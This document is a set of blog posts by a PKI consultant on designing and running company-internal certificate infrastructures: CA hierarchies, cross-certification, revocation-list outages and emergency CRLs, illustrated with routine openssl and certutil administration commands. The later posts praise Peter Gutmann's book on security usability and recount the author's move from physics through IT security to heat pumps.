When compiling the following I had in mind what I call infrastructure PKIs – company-internal systems to be used mainly for internal purposes and very often for use by devices rather than by humans. (Ah, the internet of things.)

Issues often arise due to a combination of the following:

  • Human project resources assigned to such projects are often limited.
  • Many applications simply demand certificates so you need to create them.

Since the best way to understand certificates is probably by comparing them to passports or driver licenses I will nonetheless use one issued to me as a human life-form:

Digital Certificate

In Austria the chipcards used to identify you as a patient at the doctor’s office can also be used as digital ID cards. That is, the card’s chip also holds the cryptographic private key, and the related certificate ties your identity as a citizen to the corresponding public key. A certificate is a file digitally signed by a Certificate Authority, which in this case has the name a-sign-Token-03. The certificate can be searched for in the directory (German site).

Digital X.509 Certificate: Details

The public key related to my identity as a citizen (or rather to a database record representing myself as a citizen). Like a passport, the certificate has an end of life and requires renewal.

Alternatives to Hardware Security Modules

An HSM protects the sacred private key of the certification authority. It is often a computer running a locked-down version of an operating system, equipped with sensors that detect any attempt to access the key store physically – it should actually destroy the key rather than let an attacker gain access to it.

It allows for implementing science-fiction-style (… Kirk Alpha 2 … Spock Omega 3 …) split administration and provides strong key protection that cannot be achieved if the private key is stored in software – somewhere on the hard disk of the machine running the CA.

Modern HSMs have become less cryptic in terms of usage but still: It is a hardware device not used on a daily basis, and requires additional training and management. Storage of physical items like the keys for unlocking the device and the corresponding password(s) is a challenge as is keeping the know-how of admins up to date.

Especially for infrastructure CAs I propose a purely organizational split administration for offline CAs such as a Root CA: Storing the key in software, but treating the whole CA machine as a device to be protected physically. You could store the private key of the Root CA or the virtual machine running the Root CA server on removable media (and at least one backup). The “protocol” provides split administration: E.g. one party has the key to the room, the other party has the password to decrypt the removable medium. Or the unencrypted medium is stored in a location protected by a third party – which in turn only allows two persons to enter the room together.

But before any split administration is applied, risks should be evaluated and it should be made sure that the overall security strategy does not look like this:

Steps to nowhere^ - geograph.org.uk - 666960

From the description on Wikimedia: The gate is padlocked, though the fence would not prevent any moderately determined person from gaining access.

You might have to question the holy order (hierarchy) and the security implemented at the lowest levels of CA hierarchies.

Hierarchies and Security

In the simplest case a certification authority issues certificates to end-entities – users or computers. More complex PKIs consist of hierarchies of CAs and thus tree-like structures. The theoretical real-world metaphor would be an agency issuing some license to a subordinate agency that issues passports to citizens.

Chain of certificates associated with this blog

Chain of certificates associated with this blog: *.wordpress.com is certified by Go Daddy Secure Certification Authority which is in turn certified by Go Daddy Class 2 Certification Authority. The asterisk in the names makes it usable with any wordpress.com site – but it defies the purpose of denoting one specific entity.

The Root CA at the top of the hierarchy should be the most secure one, as if it is compromised (that is: its private key has – probably – been stolen) all certificates issued somewhere in the tree should be invalidated.

However, this logic only makes sense:

  • if there is or will with high probability be at least a second Issuing CA – otherwise the security of the Issuing CA is as important as that of the Root CA.
  • if the only purpose of that Root CA is to revoke the certificate of the Issuing CA. The Root CA’s key is going to sign a blacklist referring to the Issuing CA. Since the Root should not revoke itself its key signing the revocation list should be harder to compromise than the key of the to-be-revoked Issuing CA.
Certificate Chain

The certificate chain associated with my “National ID” certificate. Actually, these certificates stored on chipcards are invalidated every time the card (which serves another purpose primarily) is retired as a physical item. Invalidation of tons of certificates can create other issues I will discuss below.

Discussions of the design of such hierarchies focus a lot on the security of the private keys and cryptographic algorithms involved.

Yet the effective security of an infrastructure PKI – in terms of Who will be able to enroll for certificate type X (which in turn might entitle you to do Y)? – is often mainly determined by typical access control lists in databases or directories that are integrated with the PKI. Think of would-be subscribers logging on to a web portal or to a Windows domain in order to enroll for a certificate. Consider e.g. Windows Autoenrollment (licensed also by non-Windows CAs) or the Simple Certificate Enrollment Protocol used with devices.

You might argue that it should be a no-no to make allegedly weak software-credential-based authentication the only prerequisite for the issuance of certificates that are then considered strong authentication. However, this is one of the things that distinguish primarily infrastructure-focused CAs from, say, governmental CAs, or “High Assurance” smartcard CAs that require a face-to-face enrollment process.

In my opinion certificates are often deployed because there is no other option to provide platform-independent authentication – as cumbersome as it may be to import key and certificate to something like a printer box. Authentication based on something else might be as secure, considering all risks, but not as platform-agnostic. (For geeks: One of my favorites is 802.1x computer authentication via PEAP-TLS versus EAP-TLS.)

It is finally the management of group memberships or access control lists or the like that will determine the security of the PKI.

Hierarchies and Cross-Certification

It is often discussed whether it makes sense to deploy more intermediate levels in the hierarchy – each level being associated with additional management effort. In theory you could delegate the management of a whole branch of the CA tree to different organizations, e.g. corresponding to continents in global organizations. Actually, I found that the delegation argument is often used for political reasons – which results in CA-per-local-fiefdom instead of the (in terms of performance much more reasonable) CA-per-continent.

I believe the most important reason to introduce the middle level is for (future) cross-certification: If an external CA cross-certifies yours it issues a certificate to your CA:

Cross Certification

Cross Certification between two CA hierarchies, each comprising three levels. Within a hierarchy each CA issues a certificate for its subordinate CA (orange lines). In addition the middle-tier CAs in each hierarchy issue certificates to the Root CAs of the other hierarchy – effectively creating logical chains consisting of 4 CAs. Image credits mine.

Any CA on any level could in principle be cross-certified. It would be easier to cross-certify the Root CA, but then the full tree of CAs subordinate to it will also be certified (for the experts: I am not considering name or other constraints here). If a CA at an intermediate level is issued the cross-certificate, trust is limited to this branch.

Cross-Certification constitutes a bifurcation in the CA tree and its consequences can be as weird and sci-fi as this sounds. It means that two different paths exists that connect an end-entity certificate to a different Root CA. Which path is actually chosen depends on the application validating the certificate and the protocol involved in exchanging or collecting certificates.

In an SSL handshake (which happens if you access your blog via https://yourblog.wordpress.com, using the certificate with that asterisk) the web server is so kind as to send the full certificate chain – usually excluding the Root CA – to the client. So the path finally picked by the client depends on the chain the server knows, or the chain that takes precedence at the server.

Cross-certification is usually done by CAs considered external, and it is expected that an application in the external world sees the path chaining to the External CAs.

Tongue-in-cheek I had once depicted the world of real PKI hierarchies and their relations as:

CA hierarchies in the real world.

CA hierarchies in the real world. Sort of. Image credits mine.

Weird things can happen if a web server is available on an internal network and accessible by the external world (…via a reverse proxy. I am assuming there is no deliberate termination of the SSL connection at the proxy – what I call a corporate-approved man-in-the-middle attack). This server knows the internal certificate chain and sends it to the external client – which does not trust the corresponding internal-only Root CA. But the chain sent in the handshake may take precedence over any other chain found elsewhere so the client throws an error.

How to Really Use “Cross-certification”

As confusing as cross-certification is – it can be used in a peculiar way to solve other PKI problems – those with applications that cannot deal with the validation of a hierarchy at all, or that can only deal with a one-level hierarchy. This is interesting in particular in relation to devices such as embedded industry systems or iPhones.

Assuming that only the needed certificates can be safely injected into the right devices and that you really know what you are doing, the full, pesky PKI hierarchy can be circumvented by providing an alternative Root CA certificate for the CA at the bottom of the hierarchy:

The real, full blown hierarchy is

  1. Root CA issues a root certificate for Root CA (itself). It contains the key 1234.
  2. Root CA issues a certificate to Some Other CA related to key 5678.

… then the shortcut hierarchy for “dumb devices” looks like:

  1. Some Other CA issues a root certificate to itself, thus to Subject named Some Other CA. The public key listed in this certificate is 5678 the same as in certificate (2) of the extended hierarchy.

Client certificates can then use either chain – the long chain including several levels or the short one consisting of a single CA only. Thus if certificates have been issued by the full-blown hierarchy they can be “dumbed-down to devices” by creating the “one-level hierarchy” in addition.
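A sketch of how such a one-level hierarchy could be produced with openssl, assuming you have access to the key pair of Some Other CA; the file names are placeholders, and the Subject must match the subject of the original Some Other CA certificate exactly:

# Re-issue "Some Other CA" as a self-signed root, reusing its existing key pair (the key '5678')
openssl req -new -key someotherca.key -subj "/CN=Some Other CA" -out selfsigned.csr
openssl x509 -req -in selfsigned.csr -signkey someotherca.key -days 3650 -out someotherca-as-root.crt

End-entity certificates issued by Some Other CA now chain either to the full hierarchy or directly to this self-signed variant – whichever root a given device has been handed. Whether a validator accepts the short chain may also depend on how strictly it matches the Authority Key Identifier: matching by key ID works, matching by issuer name and serial number does not.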

Names and Encoding

In the chain of certificates the Issuer field in the certificate of the Subordinate CA needs to be the same as the Subject field of the Root CA – just as the Subject field in my National ID certificate contains my name and the Issuer field that of the signing CA. And it depends on the application how names will be checked. In a global world, names are not simple ASCII strings anymore, and encoding matters.

Certificates are based on an original request sent by the subordinate CA, and this request most often contains the name – the encoded name. I have sometimes seen that CAs changed the encoding of the names when issuing the certificates, or they reshuffled the components of the name – the order of tags like organization and country. An application may accept that or not, and the reasons for rejections can be challenging to troubleshoot if the application is running on a blackbox-style device.
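When troubleshooting such rejections it helps to look at the raw encoding rather than at the decoded display. A quick check could look like this (the file names are placeholders):

# Show the raw ASN.1 structure: string types (PRINTABLESTRING vs. UTF8STRING)
# and the order of the name components become visible here
openssl asn1parse -in subca.pem

# The Windows view of the same certificate, decoded field by field
certutil -dump subca.cer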

Revocation List Headaches

Certificates (X.509) can be invalidated by adding their respective serial number to a blacklist. This list is – or actually: may – be checked by relying parties. So full-blown certificate validation comprises collecting all certificates in the chain up to a self-signed Root CA (Subject=Issuer) and then checking each blacklist signed by each CA in the chain for the serial number of the entity one level below:

Certificate Validation

Validation of a certificate chain (“path”). You start from the bottom and locate both CA certificates and the revocation lists via URLs in each subordinate certificate. Image credits mine.
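On Windows you can watch exactly this procedure – chain building plus fetching every CA certificate and CRL via the embedded URLs – with certutil; a minimal check against an end-entity certificate (the file name is a placeholder):

# Builds the chain up to a self-signed root, downloads CA certificates and CRLs
# from the URLs embedded in the certificates, and reports the revocation status per chain element
certutil -verify -urlfetch user.cer

The output shows, per chain element, which URLs were tried and whether the CRL was reachable and current – usually the fastest way to find the broken link.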

The downside: If the CRL isn’t available at all, applications following the recommended practices will, for example, deny network access to thousands of clients. With infrastructure PKIs that means that e.g. access to WLAN or remote access via VPN will fail.

This makes desperate PKI architects (or rather the architects accountable for the application requiring certificate based logon) build all kinds of workarounds, such as switching off CRL checking in case of an emergency or configuring grace periods. Note that this is all heavily application dependent and has to be figured out and documented individually for emergencies for all VPN servers, exotic web servers, Windows domain controllers etc.

A workaround is imperative if a very important application depends on a CRL issued by an “external” certificate provider. If I used my Austrian digital ID card’s certificate for logging on to server X, that server would need to have a valid version of this CRL, which only lives for 6 hours.

Certificate Revocation List

A Certificate Revocation List (CRL) looks similar to a certificate. It is a file signed by the Certification Authority that also signed the certificates that might be invalidated via that CRL. From downloading this CRL frequently I conclude that a current version is published every hour – so there are 5 hours of overlap.

The predicament is that CRLs may be cached for performance reasons. Thus if you publish short-lived CRLs frequently you might face “false negative” outages due to operational issues (web server down…) but if the CRL is too long-lived it does not serve its purpose.

Ideally, CRLs would be valid for a few days, but a current CRL would be published, say, every day, AND you could delete the cached CRL at the validating application every day. That’s exactly how I typically try to configure it. VPN servers, for example, have allowed deleting the CRL cache for a long time, and Windows has had a supported way to do that since Vista. This allows for reasonable continuity while revocation information would still be current.
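On a Windows client, deleting the cached CRLs looks roughly like this – a sketch; the second command is the supported way since Vista to make the chain engine treat its cache as stale:

# Remove cached CRLs from the per-user URL cache
certutil -urlcache crl delete

# Force the CryptoAPI chain engine to re-fetch CRLs instead of using cached copies
certutil -setreg chain\ChainCacheResyncFiletime @now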

If you cannot control the CRL issuance process one workaround is: Pro-active fetching of the CRL in case it is published with an overlap – that is: the next CRL is published while the current one is still valid – and mirroring the repository in question.

As an aside: It is more difficult than it sounds to give internal machines access to a “public” external URL. Machines do not necessarily use the proxy server configured for the user (which causes false positive test results – Look, I tested it by accessing it in the browser and it works), and/or machines in the servers’ network are not necessarily allowed to access “the internet”.

CRLs might also simply be too big – for some devices with limited processing capabilities. Some devices of a major vendor used to refuse to process CRLs larger than 256kB. The CRL associated with my sample certificate is about 700kB:

LDAP CDP URL

How the revocation list is located – via a URL embedded in the certificate. For the experts: OCSP is supported, too, and it is the recommended method. However, considering older devices it might be necessary to resort to CRLs.

CRL Details - Blacklist

The actual blacklist part of the CRL. The scrollbar is misleading – the list contains about 20,000 entries (best viewed with openssl or Windows certutil).

Emergency Revocation List

In case anything goes wrong – HSM inaccessible, passwords lost, datacenter 1 flooded and backup datacenter 2 destroyed by a meteorite – there is one remaining option to keep PKI-dependent applications happy:

Prepare a revocation list in advance whose end of life (NextUpdate date) is after the end of validity of the CA certificate. In contrast to any backup of key material this CRL can be “backed up” by pasting the BASE64 string to the documentation as it does not contain sensitive information.

In an emergency this CRL will be published to the locations embedded in certificates. You will never be able to revoke anything anymore as CRLs might be cached – but business continuity is secured.

Emergency CRL

An Emergency CRL for my home-grown CA. It seems 9999 days is the maximum I can use with Windows certutil. Actually, the question of How many years should the lifetime be so that I will not be bothered anymore until retirement? comes up often in relation to all kinds of validity dates.
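On a Windows (AD CS) CA the emergency CRL from the screenshot could be produced roughly like this – a sketch only; the CA name in the path is a placeholder, and the original CRLPeriod settings have to be restored afterwards:

# Stretch the CRL validity to the certutil maximum before signing the emergency CRL
certutil -setreg CA\CRLPeriodUnits 9999
certutil -setreg CA\CRLPeriod "Days"
net stop certsvc
net start certsvc

# Sign the long-lived CRL and keep a BASE64 copy in the documentation
certutil -crl
certutil -encode "%windir%\system32\CertSrv\CertEnroll\My-Root-CA.crl" emergency-crl.txt

# Afterwards: restore the original CRLPeriodUnits / CRLPeriod values and publish a normal CRL again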

What I Never Wanted to Know about Security but Found Extremely Entertaining to Read

This is in praise of Peter Gutmann‘s book draft Engineering Security, and the title is inspired by his talk Everything You Never Wanted to Know about PKI but were Forced to Find Out.

Chances are high that any non-geek reader is already intimidated by the acronym PKI – sharing the links above on LinkedIn I have been asked Oh. Wait. What the %&$%^ is PKI??

This reaction is spot-on as this post is more about usability and perception of technology by end-users despite or because I have worked for more than 10 years at the geeky end of Public Key Infrastructure. In summary, PKI is a bunch (actually a ton) of standards that should allow for creating the electronic counterparts of signatures, of issuing passports, of transferring data in locked cabinets. It should solve all security issues basically.

The following images from Peter Gutmann’s book  might invoke some memories.

Security warnings designed by geeks look like this:

Peter Gutmann, Engineering Security, certificate warning - What the developers wrote

Peter Gutmann, Engineering Security, book draft, available at https://www.cs.auckland.ac.nz/~pgut001/pubs/book.pdf, p.167. Also shown in Things that Make us Stupid, https://www.cs.auckland.ac.nz/~pgut001/pubs/stupid.pdf, p.3.

As a normal user, you might rather see this:

Peter Gutmann, Engineering Security, certificate warning - What the user sees

Peter Gutmann, Engineering Security, book draft, available at https://www.cs.auckland.ac.nz/~pgut001/pubs/book.pdf, p.168.

The funny thing was that I picked this book to take a break from books on psychology and return to the geeky stuff – and then I was back to all kinds of psychological biases and Kahneman’s Prospect Theory for example.

What I appreciate in particular is the diverse range of systems and technologies considered – Apple, Android, UNIX, Microsoft, …, all evaluated agnostically, plus a diverse range of interdisciplinary research. Now that’s what I call true erudition with a modern touch. Above all, I enjoyed the conversational and irreverent tone – I have never before started reading a book for technical reasons and then been unable to put it down because it was so entertaining.

My personal summary – which resonates a lot with my experience – is:
On trying to make systems more secure you might not only make them more unusable and obnoxious but also more insecure.

A concise summary is also given in Gutmann’s talk Things that Make Us Stupid. I liked in particular the ignition key as a real-world example for a device that is smart and easy-to-use, and providing security as a by-product – very different from interfaces of ‘security software’.

Peter Gutmann is not at all siding with ‘experts’ who always chide end-users for being lazy and dumb – writing passwords down and sticking the post-its on their screens – and who state that all we need is more training and user awareness. Normal users use systems to get their job done and they apply risk management in an intuitive way: Should I waste time following an obnoxious policy or should I try to pass that hurdle as quickly as possible to do what I am actually paid for?

Geeks are weird – that’s a quote from the lecture slides linked above. Since Peter Gutmann is an academic computer scientist and obviously a down-to-earth practitioner with ample hands-on experience – which would definitely qualify him as a Geek God – his critique is even more convincing. In the book he quotes psychological research which proves that geeks really think differently (as per standardized testing of personality types). Geeks constitute a minority of people (7%) who tend to take decisions – such as Should I click that pop-up? – in a ‘rational’ manner, as the simple and mostly wrong theories on decision making have proposed. One example Gutmann uses is testing for a basic understanding of logic, such as Does ‘All X are Y’ imply ‘Some X are Y’? Across cultures the majority of people think that this is wrong.

Normal people – and I think also geeks when they don’t operate in geek mode, e.g. in the wild, not in their programmer’s cave – fall for many so-called fallacies and biases.

Our intuitive decision making engine runs on autopilot and we get conditioned to click away EULAs, or next-next-finish the dreaded install wizards, or click away pop-ups, including the warnings. As users we don’t generate testable hypotheses or calculate risks but act unconsciously based on our experience of what has worked in the past – and usually the click-away-anything approach works just fine. You would need US Navy-style constant drilling in order to be alert enough not to fall for those fallacies. This does exactly apply to anonymous end users using their home PCs for online banking.

Security indicators like padlocks and browser address bar colors change with every version of popular browsers. Not even tech-savvy users are able to tell from those indicators if they are ‘secure’ now. But what is extremely difficult: Users would need to watch out for the lack of an indicator (one that is barely visible even when it is there). And we are – owing to confirmation bias – extremely bad at spotting the negative, the lack of something. Gutmann calls this the Simon Says problem.

It is intriguing to see how biases about what ‘the others’ – the users or the attackers – would do enter technical designs. For example it is often assumed that a client machine or user who has authenticated itself is more trustworthy – and servers are more vulnerable to a malformed packet sent after successful authentication. In the Stuxnet attack digitally signed malware (signed with stolen keys) was used – ‘if it’s signed it has to be secure’.

To make things worse, users are even conditioned for ‘insecure’ behavior: When banks use all kinds of fancy domain names to market their latest products, lure their users into clicking on links to those fancy sites in e-mails, and have them log on with their banking user accounts via these sites, they train users to fall for phishing e-mails – despite the fact that the same e-mails half-heartedly warn about clicking arbitrary links in e-mails.

I believe that in relation to systems like PKI – which require you to run some intricate procedure only every few years (these are called ceremonies for a reason) – admins should also be considered ‘users’.

I have spent many hours discussing proposed security features like Passwords need to be impossible to remember and never written down with people whose job it is to audit, draft policies, and read articles on what Gutmann calls conference-paper attacks all day. These are not the people who have to run systems, deal with helpdesk calls or costs, and with requests from VIP users such as top-level managers who are on the one hand extremely paranoid about system administrators sniffing their e-mails, yet on the other hand need instant 24/7 support with recovery of encrypted e-mails. (This should be given a name like the Top Managers’ Paranoia Paradox.)

As a disclaimer I’d like to add that I don’t underestimate cyber security threats, risk management, policies etc. It is probably the current media hype on governments spying on us that makes me advocate a contrarian view.

I could back this up by tons of stories, many of them too good to be made up (but unfortunately NDA-ed): security geeks in terms of ‘designers’ and ‘policy authors’ often underestimate time and efforts required in running their solutions on a daily basis. It is often the so-called trivial and simple things that go wrong, such as: The documentation of that intricate process to be run every X years cannot be found, or the only employee who really knew about the interdependencies is long gone, or allegedly simple logistics that go wrong (Now we are locked in the secret room to run the key ceremony… BTW did anybody think of having the media ready to install the operating system on that high secure isolated machine?).

A large European PKI setup failed (it made headlines) because the sacred key of a root certification authority had been destroyed – which is the expected behavior for so-called Hardware Security Modules when they are tampered with or at least the sensors say so, and there was no backup. The companies running the project and running operations blamed each other.

I am not quoting this to make fun of others – I made enough blunders myself. The typical response to this is: Projects or operations have been badly managed and you just need to throw more people and money at them to run secure systems in a robust and reliable way. This might be true, but it simply does not reflect the budget, time constraints, and lack of human resources typical IT departments of corporations have to deal with.

There is often a very real, palpable risk of trading off business continuity and availability (that is: safety) for security.

Again I don’t want to downplay risks associated with broken algorithms and the NSA reading our e-mail. But as Peter Gutmann points out, cryptography is the last thing an attacker would target (even if a conference-paper attack had shown it is broken) – the implementation of cryptography rather guides attackers along the lines of where not to attack. Just consider the spectacular recent ‘hack’ of a prestigious one-letter Twitter account, which actually came down to blackmailing the user after the attacker had gained control over the user’s custom domain through social engineering – most likely of underpaid call-center agents who had to face the dilemma of meeting the numbers in terms of customer satisfaction versus following the security awareness training they might have had.

Needless to say, encryption, smart cards, PKI etc. would not have prevented that type of attack.

Peter Gutmann says about himself he is throwing rocks at PKIs, and I believe you can illustrate a particularly big problem using a perfect real-life metaphor: Digital certificates are like passports or driver licenses to users – signed by a trusted agency.

Now consider the following: A user might commit a crime and his driver license is seized. PKI’s equivalent of that seizure is to have the issuing agency publish a blacklist regularly, listing all the bad guys. Police officers on the road need to have access to that blacklist in order to check drivers’ legitimacy. What happens if a user isn’t blacklisted but the blacklist publishing service is not available? The standard makes this check optional (as many other things – which is the norm when an ancient standard is retrofitted with security features), but let’s assume the police app follows the recommendation of what it SHOULD do. If the list is unavailable, the user is considered an alleged criminal and has to exit the car.

You could also imagine something similar happening to train riders who have printed out an online ticket that cannot be validated (e.g. distinguished from forgery) by the conductor due to a failure in the train’s IT systems.

Any ‘emergency’ / ‘incident’ related to digital certificates I was ever called upon to support with was related to false negatives – blocking users from doing what they need to do because of missing, misconfigured or (temporarily) unavailable certificate revocation lists (CRLs). The most important question in PKI planning is typically how to work around or prevent inaccessible CRLs. I am aware of how petty this problem may appear to readers – what’s the big deal in monitoring a web server? But have you ever noticed how many alerts (e.g. via SMS) a typical administrator gets – and how many of them are false alarms? When I ask what will happen if the PKI / the CRL signing / the web server breaks on Dec. 24 at 11:30 (in a European country), I am typically told that we need to plan for at least some days until recovery. This means that revocation information on the blacklist will be stale, too, as CRLs can be cached for performance reasons.

As you can imagine, most corporations tend to follow the reasonable approach of putting business continuity over security, so they want to make sure that a glitch in the web server hosting those blacklists will not stop 10,000 employees from accessing the wireless LAN, for example. Of course any weird standard can be worked around given infinite resources. The point I wanted to make is that these standards have been designed with something totally different in mind, by PKI Theologians in the 1980s.

Admittedly though, digital certificates and cryptography make for a great playground for geeks. I think I was a PKI theologian myself many years ago, until I morphed into what I tongue-in-cheek call an anti-security consultant – trying to help users (and admins) to keep on working despite new security features. I often advocated not using certificates and proposed alternative approaches boiling down the potential PKI project to a few hours of work – against the typical consultant’s mantra of trying to make yourself indispensable in long-term projects and of designing blackboxes the client will never be able to operate on his own. Not only because of the PKI overhead, but because the alternatives were as secure – just not as hyped.

So in summary I am recommending Peter Gutmann’s terrific resources (check out his Crypto Tutorial, too!) to anybody who is torn between geek enthusiasm for some obscure technology and questioning its value nonetheless.

Rusty Padlock

No post on PKI, certificates and keys would be complete without an image like this. I found the rusty one particularly apt here. (Wikimedia, user Garretttaggs)

On Science Communication

In a parallel universe I might work as a science communicator.

Having completed my PhD in applied physics I wrote a bunch of job applications, one of them being a bit eccentric: I applied at the Austrian national public service broadcaster. (According to Wikipedia Austria was the last country in continental Europe after Albania to allow nationwide private television broadcasting).

I deleted all those applications that would make me blush today. In my application letters I referred to the physicist’s infamous skills in analytical thinking, mathematical modeling and optimization of technical processes. Skills that could be applied to basically anything – from inventing novel tractor beam generators for space ships to automatically analyzing emoticons in Facebook messages.

If I had been required to add a social-media-style tagline in those dark ages of letters on paper and snail mail, I probably would have tagged myself as combining anything, in particular experimental and theoretical physics, and, above all, communicating science to different audiences. If memory serves I used the latter argument in my pitch to the broadcaster.

I do remember the last sentence of that pivotal application letter:

I could also imagine working in front of a camera.

Yes, I really did write that – based on a ‘media exposure’ of having appeared on local TV for some seconds.

This story was open-ended: I did not receive a reply until three months later, and at that time I was already employed as a materials scientist in R&D.

In case job-seeking graduate students are reading this: It was imperative that I added some more substantial arguments to my letters, that is: hands-on experience – maintaining UV excimer lasers, knowing how to handle liquid helium, decoding the output of X-ray diffractometers, explaining accounting errors to auditors of research grant managing agencies. Don’t rely on the analytical skills pitch for heaven’s sake.

I pushed that anecdote deep down into the netherworlds of my subconsciousness. Together with some colleagues I ritually burnt items reminiscent of university research and of that gruelling job hunt, such as my laboratory journals and print-outs of job applications. This spiritual event was eventually featured on a German proto-blog website and made the German equivalent of ritual burning the top search term for quite a while.

However, today I believe that the cheeky pitch to the broadcaster had anticipated my working as a covert science communicator:

Fast-forward about 20 years and I am designing and implementing Public Key Infrastructures at corporations. (Probably in vain, according to the recent reports about NSA activities). In such projects I covered anything from giving the first concise summary to the CIO (Could you explain what PKI is – in just two Powerpoint slides?) to spending nights in the data center – migrating to the new system together with other security nerds, fueled by pizza and caffeine.

The part I enjoyed most in these projects was the lecture-style introduction (the deep dive in IT training lingo) to the fundamentals of cryptography. Actually these workshops were the nucleus of a lecture I gave at a university later. I aimed at combining anything: Mathematical algorithms and anecdotes (notes from the field) about IT departments who locked themselves out of the high-security systems, stunning history of cryptography and boring  EU legislation, vendor-agnostic standards and the very details of specific products.

Usually the feedback was quite good though once the comment in the student survey read:

Her lectures are like a formula one race without pitstops.

This was a lecture given in English, so it is most likely worse when I talk in German. I guess, Austrian Broadcasting would have forced me to take a training in professional speaking.

As a Subversive Element I indulged in throwing in some slides about quantum cryptography – often this was considered the most interesting part of the presentation, second to my quantum physics stand-up edutainment in coffee breaks. The downside of said edutainment were questions like: And … you turned down *that* for designing PKIs?

I guess I am obsessed with combining consulting and education. Note that I am referring to consulting in terms of working hands-on with a client, for example troubleshooting why 1000 users can’t log on to their computers. I did not want to be a stereotypical management consultant churning out sleek Powerpoint slides and leaving silently before you need to get your hands dirty (paraphrasing clients’ judgements of ‘predecessors’ in projects I had to fix).

It is easy to spot educational aspects in consulting related to IT security or renewable energy. There are people who want to know how stuff really works, in particular if that helps to make yourself less dependent on utilities or on Russian gas pipelines, or to avoid being stalked by the NSA.

But now I have just started a new series of posts on Quantum Field Theory. Why on earth do I believe that this is useful or entertaining? Considering in particular that I don’t plan to cover leading edge research: I will not comment on hot new articles in Nature about stringy Theories of Everything.

I stubbornly focus on that part of science I have really grasped myself in depth – as an applied physicist slowly (re-)learning theory now. I will never reach the frontier of knowledge in contemporary physics in my lifetime. But, yes, I am guilty of sharing sensationalist physics nuggets on social media at times – and I jumped on the Negative Temperature Train last year.

My heart is in reading old text books, and in researching old patents describing inventions of the pre-digital era. If you asked me what I would save if my house is on fire I’d probably say I’d snatch the six volumes of text books in theoretical physics my former physics professor, Wilhelm Macke, has written in the 1960s. He had been the last graduate student supervised by Werner Heisenberg. Although I picked experimental physics eventually I still consider his lectures the most exceptional learning experience I ever had in life.

I have enjoyed wading through mathematical derivations ever since. Mathy physics has helped me to save money on life coaches or other therapists when I was a renowned, but nearly burnt-out ‘travelling knowledge worker’ AKA project nomad. However, I understand that advanced calculus is not everybody’s taste – you need to invest quite some time and efforts until you feel these therapeutic effects.

Yet, I aim at conveying that spirit, although I had been told repeatedly by curriculum strategists in higher education that if anything scares people off pursuing a tech or science degree – in particular, as a post-graduate degree – it is too much math, including reference to mathy terms in plain English.

However, I am motivated by a charming book:

The Calculus Diaries: How Math Can Help You Lose Weight, Win in Vegas, and Survive a Zombie Apocalypse

by science writer Jennifer Ouellette. According to her website, she is a recovering English major who stumbled into science writing as a struggling freelance writer… and who has been avidly exploring her inner geek ever since. How could you not love her books? Jennifer is the living proof that you can overcome math anxiety or reluctance, or even turn that into inspiration.

Richard Feynman has given a series of lectures in 1964 targeted to a lay audience, titled The Character of Physical Law.

Starting from an example in the first lecture, the gravitational field, Feynman expounds how physics relates to mathematics in the second lecture – by the way also introducing the principle of least action as an alternative to tackle planetary motions, as discussed in the previous post.

It is also a test of your dedication as a Feynman fan as the quality of this video is low. Microsoft Research has originally brought these lectures to the internet – presenting them blended with additional background material (*) and a transcript.

You ought to watch the video now!

You may or may not agree with Feynman’s conclusion about mathematics as the language spoken by nature:

It seems to me that it’s like: all the intellectual arguments that you can make would not in any way – or very, very little – communicate to deaf ears what the experience of music really is.

[People like] me, who’s trying to describe it to you (but is not getting it across, because it’s impossible), we’re talking to deaf ears.

This is ironic on two levels, as first of all, if anybody could get it across – it was probably Feynman. Second, I agree to him. But I will still stick to my plan and continue writing about physics, trying to indulge in the mathy aspects, but not showing off the equations in posts. Did I mention this series is an experiment?

________________________________________

(*) Technical note: You had to use Internet Explorer and install Microsoft Silverlight when this was launched in 2009 – now it seems to work with Firefox as well. Don’t hold me liable if it crashes your computer though!

Trading in IT Security for Heat Pumps? Seriously?

Astute analysts of science, technology and the world at large noticed that my resume reads like a character from The Big Bang Theory. After all, an important tag used with this blog is cliché, and I am dead serious about theory and practice of combining literally anything.

[Edit in 2016: At the time of writing this post, this blog’s title was Theory and Practice of Trying to Combine Just Anything.]

Recently I have set up our so-called business blog and business Facebook page, but I admit it is hard to recognize them as such. Our Facebook tagline says (translated from German):

Professional Tinkerers. Heat Pump Freaks. Villagers. (Ex-) IT Guys.

People liked the page – probably due to expecting this page to turn out as one of my experimental web 2.0 ventures (I am trying hard to meet those expectations anyway).

But then one of my friends asked:

Heat pumps instead of IT security – seriously?

Actually this is the pop-sci version: the true question included a lesser-known term:
Heat pumps instead of PKI?

(1) PKI and IT Security

PKI means Public Key Infrastructure, and it is not as boring as the Wikipedia definition may sound. For more than ten years it was my mission to design, implement and troubleshoot PKI systems. The emphasis is on ‘systems’: PKI is about geeky cryptographic algorithms and hyper-paranoid risk management (Would the NSA be able to hack into this?), as well as about matching corporate politics and alleged or true risks with commercially feasible technical systems. In management lingo, it is about ‘technology, people, and processes’.

Full-blown PKI projects are for large corporations – so I was travelling a lot, although I was able to turn my service offerings from ‘working on site, doing time – whatever needs to be done’ (which is actually the common way to work as an expert freelancer in IT) into ‘working mainly remote – working on very specific tasks only’. I turned into a PKI designer, firefighter and reviewer. I gave PKI workshops and an academic lecture about PKI for years.

There was nothing wrong with PKI as such: I enjoyed the geeky community of like-minded peers, and the business was self-running. The topic is hot. Just read your favorite tech newspaper’s articles on two-factor authentication or the like – both corporate compliance rules and new security threats related to cloud computing make continued demand for PKI and related technologies a sure bet.

(2) Portfolio of Passions

I would like to borrow another author’s picture here: In The Monk and the Riddle: The Art of Creating a Life While Making a Living, Randy Komisar – Silicon Valley virtual CEO – expounds how he dabbled in some creative ventures after graduating, and how he finally embarked on a career as a lawyer. And how he saw his future unfolding before him – Associate, Senior… Partner. He could see the office doors lined up neatly, reflecting the ever-progressing evolution of what we call a career – and he quit his career as a lawyer.

In particular, I like Komisar’s definition of passion, which should not be confused with the new-agey approach of following your passion.

It is not about the passion, but about a portfolio of passions – don’t drive yourself crazy by trying to find THE passion once and for all.

My personal portfolio has always comprised a whole lot – this blog has its name for a reason. Probably I will some day blog about all the studies and master’s degree programs I have ever considered attending. When I was a teenager there were times when philosophy and literature scored higher than anything science-y.

So I had ended up in an obscure, but sought-after sub-branch of IT security. I have gone to great lengths in this blog to explain my transition from physics to IT. However, physics, science, and engineering never vanished from my radar for opportunities.

